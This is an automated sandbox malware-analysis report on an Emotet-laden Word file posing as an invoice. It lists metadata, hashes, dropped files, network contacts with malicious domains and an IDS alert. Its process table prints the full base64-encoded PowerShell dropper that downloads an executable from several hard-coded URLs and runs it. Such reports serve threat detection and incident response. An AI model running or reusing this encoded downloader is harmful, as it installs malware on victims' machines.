File name: | RequestedXinvoiceXsentXXX10.2019.doc |
Full analysis: | https://app.any.run/tasks/6f5e5f12-749a-4e39-b8af-76fdcc26ec44 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 15:02:07 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: conglomeration, Subject: Dynamic, Author: Katelin Jast, Keywords: web-readiness, Comments: Jewelery, Template: Normal.dotm, Last Saved By: Ryan Roberts, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 07:34:00 2019, Last Saved Time/Date: Mon Oct 14 07:34:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 175, Security: 0 |
MD5: | 022464DC4E9D43CF0AE506C16BC17A6D |
SHA1: | 194AE4CF7B389AE3287A6C78503BCB45CFDA12FB |
SHA256: | 89FC4F5028D780923B7D20846EA8BFF55C93BB68DCCF1CC8B1F7CD87EEC0726F |
SSDEEP: | 6144:oHc1HaeCCKUzSdWnLx3a5F1TpJWsWO/g2aJFCHosE9:oHc1HaeCvUGdWt3SF/g2cEBe |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | conglomeration |
---|---|
Subject: | Dynamic |
Author: | Katelin Jast |
Keywords: | web-readiness |
Comments: | Jewelery |
Template: | Normal.dotm |
LastModifiedBy: | Ryan Roberts |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:10:14 06:34:00 |
ModifyDate: | 2019:10:14 06:34:00 |
Pages: | 1 |
Words: | 30 |
Characters: | 175 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Bradtke Group |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 204 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Paucek |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
592 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\RequestedXinvoiceXsentXXX10.2019.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3920 | powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABmADYAMAA5ADYAOABkADYAOQBkAD0AJwBhADAAeAA1AGIANABhADIANABhAGYANQA1ACcAOwAkAGEAMAB4ADUAMwBmAGUANgA1ADMAYgBmAGQAMQBhAGIANgA2ACAAPQAgACcANwA0ADMAJwA7ACQAYQAwAHgAMAAxADAAYgBiAGYAYwBiADkANwA1ADkAPQAnAGEAMAB4ADkAZgA5AGUANgA1AGIAZgA3AGMAMwBlAGIAYgAnADsAJABhADAAeAA4AGUAMQAxAGUAYQBkADcAMQBkADQANwBiAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABhADAAeAA1ADMAZgBlADYANQAzAGIAZgBkADEAYQBiADYANgArACcALgBlAHgAZQAnADsAJABhADAAeAAzAGUANgA5ADcAYgA1AGUAMgA5AD0AJwBhADAAeAAxAGMANQA4AGIAMwA2ADYAYgA0AGIAZAAxACcAOwAkAGEAMAB4AGQANAAzADkANwAxADMANgBlADQAMQAxADMAZgA2AD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABuAEUAVAAuAFcAZQBCAEMATABJAGUATgBUADsAJABhADAAeAAyAGUAZAA2AGIANgBlADEAYgA4ADUAMQA9ACcAaAB0AHQAcAA6AC8ALwBzAGcAbgByAC4AaQBuAC8AZABpAGUAdABpAHQAaQBhAG4AcwBhAGsAcwBoAGkALwBhADQAZABlAG4AbwAzAHcALQA3AGsAZQA3AHkAMgAtADcAMAA2ADMANwAwADQAMQAyAC8AKgBoAHQAdABwADoALwAvAHAAZQBkAHIAbwBvAHQAYQB2AGkAbwAuAHQAbwBwAC8AYwBnAGkALQBiAGkAbgAvADkAaQBhAGwAZQAtAGMAYQA2AGQAdAByADYAZwBrAC0ANQA2ADEANQAxADcANgAyAC8AKgBoAHQAdABwAHMAOgAvAC8AagAtAGMAdABhAC4AbwByAGcALwB3AHAALQBhAGQAbQBpAG4ALwBMAGcAYgBvAFkASQBtAC8AKgBoAHQAdABwAHMAOgAvAC8AdABoAGUAaABvAG0AZQBiAGUAbgBlAGYAaQB0AHAAcgBvAGcAcgBhAG0ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEgAcgBjAGkAQwBOAC8AKgBoAHQAdABwAHMAOgAvAC8AYQBkAGEAbgB6AHkAZQB5AGEAcABpAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwA0AHYAMABwAC0AdAAxAGUANgBzADYAbQA2AC0AMAA5ADgALwAnAC4AIgBTAFAATABgAGkAdAAiACgAJwAqACcAKQA7ACQAYQAwAHgAYwAzADEAMABlADMANwAzAGYAZQBkAD0AJwBhADAAeABjAGMAYQAwAGQAYgA3AGEAMgA3ACcAOwBmAG8AcgBlAGEAYwBoACgAJABhADAAeAAyAGEAZABiAGIAZABmADEAMwAxAGYANQA0ADgAIABpAG4AIAAkAGEAMAB4ADIAZQBkADYAYgA2AGUAMQBiADgANQAxACkAewB0AHIAeQB7ACQAYQAwAHgAZAA0ADMAOQA3ADEAMwA2AGUANAAxADEAMwBmADYALgAiAEQATwBXAG4AYABMAG8AQQBgAEQAYABGAGkATABlACIAKAAkAGEAMAB4ADIAYQBkAGIAYgBkAGYAMQAzADEAZgA1ADQAOAAsACAAJABhADAAeAA4AGUAMQAxAGUAYQBkADcAMQBkADQANwBiACkAOwAkAGEAMAB4AGUAZgAyADgANwA3ADIAMQA1ADUANQA5AGEAPQAnAGEAMAB4AGQANQBiADUAOABjADAANwBmADMAMQAzAGUAZABkACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAYQAwAHgAOABlADEAMQBlAGEAZAA3ADEAZAA0ADcAYgApAC4AIgBMAEUAYABOAEcAYABUAGgAIgAgAC0AZwBlACAAMwA4ADUANwA0ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgBUACIAKAAkAGEAMAB4ADgAZQAxADEAZQBhAGQANwAxAGQANAA3AGIAKQA7ACQAYQAwAHgAYwBiADAANAA0AGEAOAA3AGIANwA1ADcAPQAnAGEAMAB4ADUAYQAyADkANAA3ADIAYwA4AGQANwAzADUANgAnADsAYgByAGUAYQBrADsAJABhADAAeAA0ADgAYQA5AGMAZgAzADQAOABiADMAZQA9ACcAYQAwAHgAYgAwADgAMgBiADkAYwAzADgAMgBhADAAMwAyACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGEAMAB4ADQAMgAzADgAMwBjAGMAZAAzADYANwBkADAAOQA9ACcAYQAwAHgAZgAyADIANwBhADIAYQBhADYAMABmADgAZgBjAGIAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRBFFF.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3920 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XMAPDUEN6VSCDGD7EFXW.temp | — | |
MD5:— | SHA256:— | |||
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:1C35EE514DC2C39DD1D26D4F227A1E70 | SHA256:9D5E8761F8DD70161441CCF14DFBDC415D06E4901BE9AEA4A285AD355EF0605A | |||
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E60DC6E3.wmf | wmf | |
MD5:565C85E6FE26CF8F035250E16D34F081 | SHA256:8D8047BA86B065F8D0D507DDD650368D3A7B1175868A4B0D86294B6C2B663CF2 | |||
592 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:E1E755A4091E2D3D0C180A378BC8E635 | SHA256:E3A72D8AAF79D861232A9FB7708289C906B122349E35734C248A8582B5494758 | |||
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B95345E9.wmf | wmf | |
MD5:14B3FCD741F1C6DD9E6871B142956FE2 | SHA256:03E4C21C4C10823DB3C9422E59C201AE5BCA71EE6CEEC37A56B89C053272A262 | |||
592 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\RequestedXinvoiceXsentXXX10.2019.doc.LNK | lnk | |
MD5:B1BE8188F3C2213A8FA923D3FFF2A1A2 | SHA256:DE1D8409FCB973F132DB6B431C4EDD4C988574197F8B32ED81609DD83B52E860 | |||
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EE9D66EE.wmf | wmf | |
MD5:F22918D61876C519DBEE94F5268584C1 | SHA256:229906B97CE1D5CC933C3DE7B3C71CA0CC01BA9CA8C9F30E9FC09083B2F125AD | |||
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\981C8B88.wmf | wmf | |
MD5:0FFDEDA8D9448338A517CAD3A10D6E2A | SHA256:91A9703056CC3FEFD865A73B448B3CDC1232ABD154F17E06DD6EF640708B61A1 | |||
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F2A48DF.wmf | wmf | |
MD5:3F9DDCC509FCFB348AD3436BDBDD07DA | SHA256:8C3567A2DE32B77EDC4CC61F41FE76B655F141D25A5EC334BAC559AD75F9C3ED |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3920 | powershell.exe | GET | — | 187.17.111.47:80 | http://pedrootavio.top/cgi-bin/9iale-ca6dtr6gk-56151762/ | BR | — | — | malicious |
3920 | powershell.exe | GET | — | 187.17.111.47:80 | http://pedrootavio.top/cgi-bin/9iale-ca6dtr6gk-56151762/ | BR | — | — | malicious |
3920 | powershell.exe | GET | 404 | 13.234.168.135:80 | http://sgnr.in/dietitiansakshi/a4deno3w-7ke7y2-706370412/ | IN | html | 23.7 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3920 | powershell.exe | 187.17.111.47:80 | pedrootavio.top | Universo Online S.A. | BR | malicious |
3920 | powershell.exe | 13.234.168.135:80 | sgnr.in | Amazon.com, Inc. | IN | suspicious |
Domain | IP | Reputation |
---|---|---|
sgnr.in |
| suspicious |
pedrootavio.top |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |